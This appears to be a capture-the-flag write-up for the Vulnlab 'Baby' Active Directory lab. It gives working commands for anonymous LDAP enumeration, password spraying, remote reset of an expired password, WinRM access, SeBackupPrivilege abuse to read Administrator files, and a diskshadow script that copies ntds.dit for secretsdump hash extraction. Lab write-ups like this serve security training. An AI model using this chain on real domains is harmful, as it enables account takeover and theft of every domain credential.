Post

Vulnlab - Baby

Posted Updated
Preview Image
By lineeralgebra
2 min read
Vulnlab - Baby
1
2

➜  baby nxc smb 10.10.66.181
SMB         10.10.66.181    445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)

there is no Guests access and smth like that so lets do ldapsearch

ldapsearch

1

➜  baby ldapsearch -x -b "dc=baby,dc=vl" -H ldap://10.10.66.181 > ldap_resul.txt

Now we can analyze it but its huge to read one of one so;

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

➜  baby cat ldapresult.txt | grep -i "password"
badPasswordTime: 0
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=baby,DC=vl
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=baby,DC=vl

description: Set initial password to BabyStart123! got password but there is no users list yet we alraedy know sAMAccountname inital with usernames,groups etc.

➜  baby cat ldapresult.txt | grep -i "sAMAccountname"

sAMAccountName: dev
sAMAccountName: Jacqueline.Barnett
sAMAccountName: Ashley.Webb
sAMAccountName: Hugh.George
sAMAccountName: Leonard.Dyer
sAMAccountName: it
sAMAccountName: Connor.Wilkinson
sAMAccountName: Joseph.Hughes
sAMAccountName: Kerry.Wilson
sAMAccountName: Teresa.Bell
sAMAccountName: Caroline.Robinson

for save it clearly.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

➜  baby cat ldap-user.txt | awk '{print $2}'
dev
Jacqueline.Barnett
Ashley.Webb
Hugh.George
Leonard.Dyer
it
Connor.Wilkinson
Joseph.Hughes
Kerry.Wilson
Teresa.Bell
Caroline.Robinson

➜  baby cat ldap-user.txt | awk '{print $2}' > users.txt ## STATUS_PASSWORD_MUST_CHANGE
➜  baby nxc smb BABYDC -u users.txt -p 'BabyStart123!' --continue-on-succes

SMB         10.10.66.181    445    BABYDC           [-] baby.vl\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE

https://www.n00py.io/2021/09/resetting-expired-passwords-remotely/

1
2
3
4
5
6
7
8
9

➜  baby python3 smbpasswd.py  'Caroline.Robinson:BabyStart123!@baby.vl' -newpass Password123!
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[!] Password is expired, trying to bind with a null session.
[*] Password was changed successfully

➜  baby nxc smb BABYDC -u users.txt -p 'Password123!' --continue-on-succes

SMB         10.10.66.181    445    BABYDC           [+] baby.vl\Caroline.Robinson:Password123!

we have also winrm-shell

1
2
3

➜  baby nxc winrm BABYDC -u Caroline.Robinson -p 'Password123!' --continue-on-succes
WINRM       10.10.66.181    5985   BABYDC           [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl)
WINRM       10.10.66.181    5985   BABYDC           [+] baby.vl\Caroline.Robinson:Password123! (Pwn3d!)

SeBackupPrivilege

1
2
3

*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> whoami /all

SeBackupPrivilege             Back up files and directories  Enabled

Here is fast root

1
2
3
4
5

*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> robocopy /b C:\Users\Administrator\Desktop .; cat root.txt

---

VL{REDACTED}

DUMP ntds.dit and system then crack admin hash;

1
2
3
4
5

➜  baby cat raj.dsh
set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:

using unix2dos

1
2

➜  baby unix2dos raj.dsh
unix2dos: converting file raj.dsh to DOS format...

and uploda it at C:\ProgramData

1
2
3

*Evil-WinRM* PS C:\ProgramData> diskshadow /s raj.dsh

*Evil-WinRM* PS C:\ProgramData> robocopy /b z:\windows\ntds . ntds.dit

download ntds.dit download system

and

1

impacket-secretsdump -ntds ntds.dit -system system local

😉

VulnLab
smbpasswd SeBackupPrivilege
This post is licensed under CC BY 4.0 by the author.